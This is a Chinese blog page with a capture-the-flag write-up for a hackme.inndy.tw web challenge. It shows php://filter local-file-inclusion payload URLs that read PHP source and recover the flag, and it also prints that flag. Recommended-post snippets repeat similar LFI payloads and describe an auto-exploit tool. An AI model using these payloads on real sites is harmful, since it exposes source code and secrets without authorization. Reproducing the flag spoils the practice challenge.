【Hackme CTF】Web--LFI

最新推荐文章于 2024-05-14 19:08:48 发布
最新推荐文章于 2024-05-14 19:08:48 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: hackme.inndy.tw
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34072526/article/details/89431431
版权

Description:

What this admin’s password? That is not important at all, just get the flag.

Tips: LFI, php://filter

Solution:

其实见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本地文件
https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag
发现网页出现一行base64
Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K
base64解码得
Can you read the flag<?php require('config.php'); ?>?
所以写网址为
https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config
得到base64
PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==
base64解码得

<?php
    $flag = "FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}";

Flag:

FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}

VZZmieshenquan
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LFI_autoexploiter:自动利用LFI Web漏洞。 它能够使用base64提取,空字节绕过和URL编码绕过
03-11
LFI_autoexploiter 自动利用LFI Web漏洞。 安装 就像这样简单:git clone 用法 用法:lfi_extractor.py [-h] [-URL URL] [-path_list PATH_LIST] [--b64 B64] [--url_enc URL_ENC] [--null NULL] [--output OUTPUT] [--static STATIC] [ --dynamic DYNAMIC] 可选参数: -h,--help显示此帮助消息并退出 -url URL示例: : -path_list PATH_LIST要提取的LFI文件的路径。 在扫描模式下不需要 --b64 B64如果给定1,则使用php base64提取 --url_enc URL_ENC如果给定1,则使用url编码 --null NULL如果给定1,则添加一个空字节 --
Hackme CTFWeb--scoreboard
VZZmieshenquan的博客
04-21 513
Description: DO NOT ATTACK or SCAN scoreboard, you don’t need to do that. Solution: 抓包发现flag在x-flag头里 Flag: FLAG{Header can hide some data aswell.}
小白从0学习ctfweb安全)_lfi ctf(2)
最新发布
2401_84972814的博客
05-14 700
此文章是小白为了学习ctf所写的,此文章将会采用刷题的形式来记录ctf的解题思路,禁止用此技术进行非法攻击。此关卡是在bugkuCTF平台写的自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
ctf本地包括_南邮大学CTF web LFI本地文件包含解题思路
weixin_39633781的博客
12-19 301
0x00 php://filter简单理解:php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西;使用不同的参数可以达到不同的目的和效果:名称 描述 备注resource=指定了你要筛选过滤的数据流。必选read=可以设定一个或多个过滤器名称,以管道符(|)分隔。可选write...
Hackme CTFWeb--hide and seek
VZZmieshenquan的博客
04-21 611
Description: Can you see me? I’m so close to you but you can’t see me. Solution: 点开网址 https://hackme.inndy.tw/ 查看页面源代码,拉到最底端看到flag Flag: FLAG{0h U C meeeeeeeeeeeeeeeeeeee!} ...
云演 CTF Web题型 lfi 文件包含
cadandme的博客
01-22 3017
文件包含 打开页面,典型的文件包含,文件包含的读取格式如下: ?file=php://filter/read=convert.base64-encode/resource=flag 读取到base64编码再解码,就得到 因为解码后还有url编码存在,谨慎起见,放到URL解码,得到真正的flag ...
ctf-all-in-one
01-30
ctf-all-in-one
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件名
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
LFI(包含本地文件) 进攻简介 下面是纯bb,了解过的跳过这部分; 解释:LFI是能够打开并包含本地文件的漏洞; 这里区别一下RFI,远程文件包含突破; 实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞; PHP包含读文件; PHP包含写文件; PHP包含日志文件; PHP截断包含; PHP内置伪协议利用。 PHP中文件包含函数有以下样式: 要求() require_once() 包括() include_once() include和require区别主要是,include在包含的过程中如果出现错误,会引发一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。 而include_once(),require_once()这两个函数,与前两个
XCITC-WEB-LFI(本地文件包含漏洞)
Home to come
04-12 643
php://filter协议 php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取 php://filter/read=<读链需要应用的过滤器列表>,同样write是写链 这个参数采用一个或以管道符 | 分隔的多个过滤器名称。 <?php /* 这会以大写字母输出 www.example.com 的全部内容 */ r...
CTF web题总结--LFI
bob的博客
08-30 8710
本地文件包含漏洞(Local File Include),是php的include()函数存在设计缺陷,学习链接:php文件包含漏洞总结 题目的url都是类似这种:http://127.0.0.1/web500/index.php?action=front&mode=index http://127.0.0.1/web500/index.php?action=front&mode=newnote
云演CTF刷题 lfi
11-22 584
先BASE64解码,再url解码。
2021GKCTF-hackme
unexpectedthing的博客
07-13 715
GKCTF-hackme
云演CTF: 006.Lfi
wanguixiu的博客
06-09 551
云演CTF: 006.Lfi 作者: admin 时间: 2021-05-28 分类: 云演CTF 看名字就知道是local file include(本地文件包含),之前的笔记里有写过(打ctf时记的笔记(php))payload: ?file=php://filter/read=convert.base64-encode/resource...
[GKCTF 2021]hackme
cjdgg的博客
11-21 2343
[GKCTF 2021]hackme 进入题目后,题目如上所示,查看页面源代码 提示nosql,这里推荐WHOAMI大佬的文章 这里源代码我们也看到了php头,那我们就看大佬文章里php中的nosql注入部分就行 这里数据包是json格式,我们试一下重言式注入 被过滤了,提示也说了,可以用Unicode绕过 成功绕过,这里放的是ne,意思为不等于,可以再试试eq,我把用户名的换成了eq,可以看到这个报错,应该是用户名对了,密码不对(ne和eq前面要有$符号的,csdn不知道为啥写不出来) 既然如此
CTF_WEB题心得
CODER的博客
07-30 2789
1.看源码 注释 firefox找cookie 看响应 2.web题大多结合加密与解密 3.curl命令 最近遇到一道题 302跳转 本以为是基础的重定向 在网站域名上很细节1变成l curl -L http://xxx 跟随302跳转 curl http://xxx 默认不跟随302跳转 4.抓包修改 firefox极力推荐!!! burp每次要改代理很烦 5.其他就是一些php...
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值